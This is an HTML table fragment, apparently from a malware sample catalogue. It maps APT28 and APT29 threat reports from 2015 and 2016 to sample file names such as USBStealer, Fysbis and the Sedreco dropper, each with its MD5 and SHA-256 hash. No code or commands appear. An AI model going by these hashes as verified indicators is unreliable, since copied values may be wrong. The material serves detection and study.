<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-10_New Adobe Flash Zero-Day Used in Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A5FCA59A2FAE0A12512336CA1B78F857AFC06445AFC06445_ mgswizap.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f1d3447a2bff56646478b0adb7d0451c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5a414a39851c4e22d4f9383211dfc080e16e2caffd90fa06dcbe51d11fdb0d6c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-10_Root9_APT28_targets Financial Markets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-10_Root9_APT28_targets Financial Markets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0450AAF8ED309CA6BAF303837701B5B23AAC6F05_servicehost.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">800af1c9d341b846a856a1e686be6a3e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-10_Root9_APT28_targets Financial Markets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F325970FD24BB088F1BEFDAE5788152329E26BF3_SupUpNvidia.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0369620eb139c3875a62e36bb7abdae8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b1f2d461856bb6f2760785ee1af1a33c71f84986edf7322d3e9bd974ca95f92d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Bitdefender_In-depth_analysis_of_APT28â€"The_Political_Cyber-Espionage</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Bitdefender_In-depth_analysis_of_APT28â€"The_Political_Cyber-Espionage</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Bitdefender_In-depth_analysis_of_APT28â€"The_Political_Cyber-Espionage.pdf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1a5d89f6fd3f1ed5f4e76084b0fa7806</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a76b1ec9d196b5c071992486d096ad475226e92b6db06c351e3a4ad4e4949248</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Bitdefender_In-depth_analysis_of_APT28â€"The_Political_Cyber-Espionage</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">CB796F2986700DF9CE7D8F8D7A3F47F2EB4DF682_xp.exe_APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">78450806e56b1f224d00455efcd04ce3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b29a16ec907997e523f97e77b885d4a8c19cb81b1abf6ee51eee54f37eecf3ff</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Bitdefender_In-depth_analysis_of_APT28â€"The_Political_Cyber-Espionage</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F080E509C988A9578862665B4FCF1E4BF8D77C3E_Linux.Fysbis.A_ksysdefd_elf_APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">075b6695ab63f36af65f7ffd45cccd39</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Bitdefender_In-depth_analysis_of_APT28â€"The_Political_Cyber-Espionage</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">SIMILAR</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">SIMILAR</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">356d03f6975f443d6db6c5069d778af9_exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">356d03f6975f443d6db6c5069d778af9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3f14fc9c29763da76dcbc8a2aaa61658781d1b215ee322a0ebfa554d8658d22b</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">SIMILAR</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">78450806e56b1f224d00455efcd04ce3_xp.exe_APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">78450806e56b1f224d00455efcd04ce3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b29a16ec907997e523f97e77b885d4a8c19cb81b1abf6ee51eee54f37eecf3ff</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">SIMILAR</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e49bce75070a7a3c63a7cebb699342b3_CVE-2014-4076_tan.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e49bce75070a7a3c63a7cebb699342b3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">16d49a40333f584b19606733b4deef1b9ecace2c32950010ad1450b44ce3716e</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1A4F39C0262822B0623213B8ED3F56DEE0117CD59_tf394kv.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8c4d896957c36ec4abeb07b2802268b9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6cd30c85dd8a64ca529c6eab98a757fb326de639a39b597414d5340285ba91c6</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1A4F39C0262822B0623213B8ED3F56DEE0117CD5_tf394kv.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8c4d896957c36ec4abeb07b2802268b9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6cd30c85dd8a64ca529c6eab98a757fb326de639a39b597414d5340285ba91c6</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">314EF7909CA0ED3A744D2F59AB5AC8B8AE259319.dll_(4.3)AZZYimplants-USBStealer</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f6f88caf49a3e32174387cacfa144a89</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e917166adf6e1135444f327d8fff6ec6c6a8606d65dda4e24c2f416d23b69d45</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3E2E245B635B04F006A0044388BD968DF9C3238C_IGFSRVC.dll_USBStealer</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ce151285e8f0e7b2b90162ba171a4b90</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">776C04A10BDEEC9C10F51632A589E2C52AABDF48_USBGuard.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8cb08140ddb00ac373d29d37657a03cc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">690b483751b890d487bb63712e5e79fca3903a5623f22416db29a0193dc10527</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">AF86743852CC9DF557B62485715AF4C6D73644D3_AZZY4.3installer</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c3ae4a37094ecfe95c2badecf40bf5bb</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">67ecc3b8c6057090c7982883e8d9d0389a8a8f6e8b00f9e9b73c45b008241322</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C78FCAE030A66F388BF8CEA569422F5A79B7B96C_tmpdt.tmp_(4.3)AZZYimplant</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ce8b99df8642c065b6af43fde1f786a3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1bab1a3e0e501d3c14652ecf60870e483ed4e90e500987c35489f17a44fef26c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C78FCAE030A66F388BF8CEA569422F5A79B7B96C_tmpdt.tmp__</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ce8b99df8642c065b6af43fde1f786a3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1bab1a3e0e501d3c14652ecf60870e483ed4e90e500987c35489f17a44fef26c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E251B3EB1449F7016DF78D113571BEA57F92FC36c_servicehost.dll_USBStealer</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8b238931a7f64fddcad3057a96855f6c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E3B7704D4C887B40A9802E0695BAE379358F3BA0_Stand-aloneAZZYbackdoor</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a96f4b8ac7aa9dbf4624424b7602d4f7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a9dc96d45702538c2086a749ba2fb467ba8d8b603e513bdef62a024dfeb124cb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F325970FD24BB088F1BEFDAE5788152329E26BF3_SupUpNvidia.exe_USBStealer</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0369620eb139c3875a62e36bb7abdae8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b1f2d461856bb6f2760785ee1af1a33c71f84986edf7322d3e9bd974ca95f92d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015_06_Microsoft_Security_Intelligence_Report_V19</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015_06_Microsoft_Security_Intelligence_Report_V19</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0450AAF8ED309CA6BAF303837701B5B23AAC6F05_servicehost.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">800af1c9d341b846a856a1e686be6a3e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015_06_Microsoft_Security_Intelligence_Report_V19</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1535D85BEE8A9ADB52E8179AF20983FB0558CCB3.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4ac8d16ff796e825625ad1861546e2e8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8c488b029188e3280ed3614346575a4a390e0dda002bca08c0335210a6202949</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-02_PaloAlto_Fysbis Sofacy Linux Backdoor</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-02_PaloAlto_Fysbis Sofacy Linux Backdoor</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9444D2B29C6401BC7C2D14F071B11EC9014AE040_Fysbis_elf_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">364ff454dcf00420cff13a57bcb78467</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-02_PaloAlto_Fysbis Sofacy Linux Backdoor</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A Look Into Fysbis_ Sofacy’s Linux Backdoor - Palo Alto Networks Blog.pdf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9a6b771c934415f74a203e0dfab9edbe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1b6c3e6ef673f14536ff8d7c2bf18f9358a9a7f8962a24e2255f54ac451af86c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-02_PaloAlto_Fysbis Sofacy Linux Backdoor</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ECDDA7ACA5C805E5BE6E0AB2017592439DE7E32C_ksysdefd_elf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e107c5c84ded6cd9391aede7f04d64c8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-02_PaloAlto_Fysbis Sofacy Linux Backdoor</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F080E509C988A9578862665B4FCF1E4BF8D77C3E</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">075b6695ab63f36af65f7ffd45cccd39</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT29 </td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0B3852AE641DF8ADA629E245747062F889B26659.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cc9e6578a47182a941a478b276320e06</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fd39d2837b30e7233bc54598ff51bdc2f8c418fa5b94dea2cadb24cf40f395e5</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">74C190CD0C42304720C686D50F8184AC3FADDBE9.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">19172b9210295518ca52e93a29cfe8f4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">40ae43b7d6c413becc92b07076fa128b875c8dbb4da7c036639eccf5a9fc784f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Bears in the Midst_ Intrusion into the Democratic National Committee ».pdf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dd5e31f9d323e6c3e09e367e6bd0e7b1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2d815b11f3b916bdc27b049402f5f1c024cffe2318a4f27ebfa3b8a9fffe2880</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">CB872EDD1F532C10D0167C99530A65C4D4532A1E.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ce227ae503e166b77bf46b6c8f5ee4da</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b101cd29e18a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E2B98C594961AAE731B0CCEE5F9607080EC57197_pagemgr.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">004b55a66b3a86a1ce0a0b9b69b95976</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6c1bce76f4d2358656132b6b1d471571820688ccdbaca0d86d0ca082b9390536</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F09780BA9EB7F7426F93126BC198292F5106424B_VmUpgradeHelper.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9e7053a4b6c9081220a694ec93211b4e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-07_Invincea_Tunnel of Gov DNC Hack and the Russian XTunnel</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-07_Invincea_Tunnel of Gov DNC Hack and the Russian XTunnel</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E2101519714F8A4056A9DE18443BC6E8A1F1B977_PortMapClient.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ad44a7c5e18e9958dda66ccfc406cd44</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b81b10bdf4f29347979ea8a1715cbfc560e3452ba9fffcc33cd19a3dc47083a4</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-07_Invincea_Tunnel of Gov DNC Hack and the Russian XTunnel</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F09780BA9EB7F7426F93126BC198292F5106424B_VmUpgradeHelper.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9e7053a4b6c9081220a694ec93211b4e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-07_Invincea_Tunnel of Gov DNC Hack and the Russian XTunnel</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Tunnel of Gov_ DNC Hack and the Russian XTunnel _ Invincea.pdf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b1b88f78c2f4393d437da4ce743ac5e8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fb0cb4527efc48c90a2cd3e9e46ce59eaa280c85c50d7b680c98bb159c27881d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Observing the Comings and Goings</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Observing the Comings and Goings</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eset-sednit-part-2.pdf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c3c278991ad051fbace1e2f3a4c20998</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f9ed13d5aa43c74287a936bf52772080fc26b5c62a805e19abceb20ef08ea5ff</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Observing the Comings and Goings</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Sedreco-dropper</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Sedreco-dropper</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4F895DB287062A4EE1A2C5415900B56E2CF15842</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5363e5cc28687b7dd71f1e257eab2d5d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d403ded7c4acfffe8dc2a3ad8fb848f08388b4c3452104f6970835913d92166c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Sedreco-dropper</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">87F45E82EDD63EF05C41D18AEDDEAC00C49F1AEE</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9617f3948b1886ebc95689c02d2cf264</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">378ef276eeaa4a29dab46d114710fc14ba0a9f964f6d949bcbc5ed3267579892</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Sedreco-dropper</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8EE6CEC34070F20FD8AD4BB202A5B08AEA22ABFA</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">30cda69cf82637dfa2ffdc803bf2aead</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">20ac1420eade0bdb464cd9f6d26a84094271b252c0650a7853721d8e928f6e6c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Sedreco-dropper</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9E779C8B68780AC860920FCB4A8E700D97F084EF</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f686304cff9b35ea0d7647820ab525ba</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2c81023a146d2b5003d2b0c617ebf2eb1501dc6e55fc6326e834f05f5558c0ec</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Sedreco-dropper</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C23F18DE9779C4F14A3655823F235F8E221D0F6A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9f82abbaebc1093a187f1887df2cf926</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ec2f14916e0b52fb727111962dff9846839137968e32269a82288aee9f227bd4</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Sedreco-dropper</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E034E0D9AD069BAB5A6E68C1517C15665ABE67C9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6a24be8f61bcd789622dc55ebb7db90b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fb3a3339e2ba82cb3dcdc43d0e49e7b8a26ced3a587f5ee15a256aee062e6e05</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Sedreco-dropper</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E17615331BDCE4AFA45E4912BDCC989EACF284BC</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5e93cf87040cf225ab5b5b9f9f0a0d03</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6bbec6b2927325891cc008d3378d30941fe9d21e5c9bd6459e8e3ba8c78833c2</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Observing the Comings and Goings</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Sedreco_payload</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
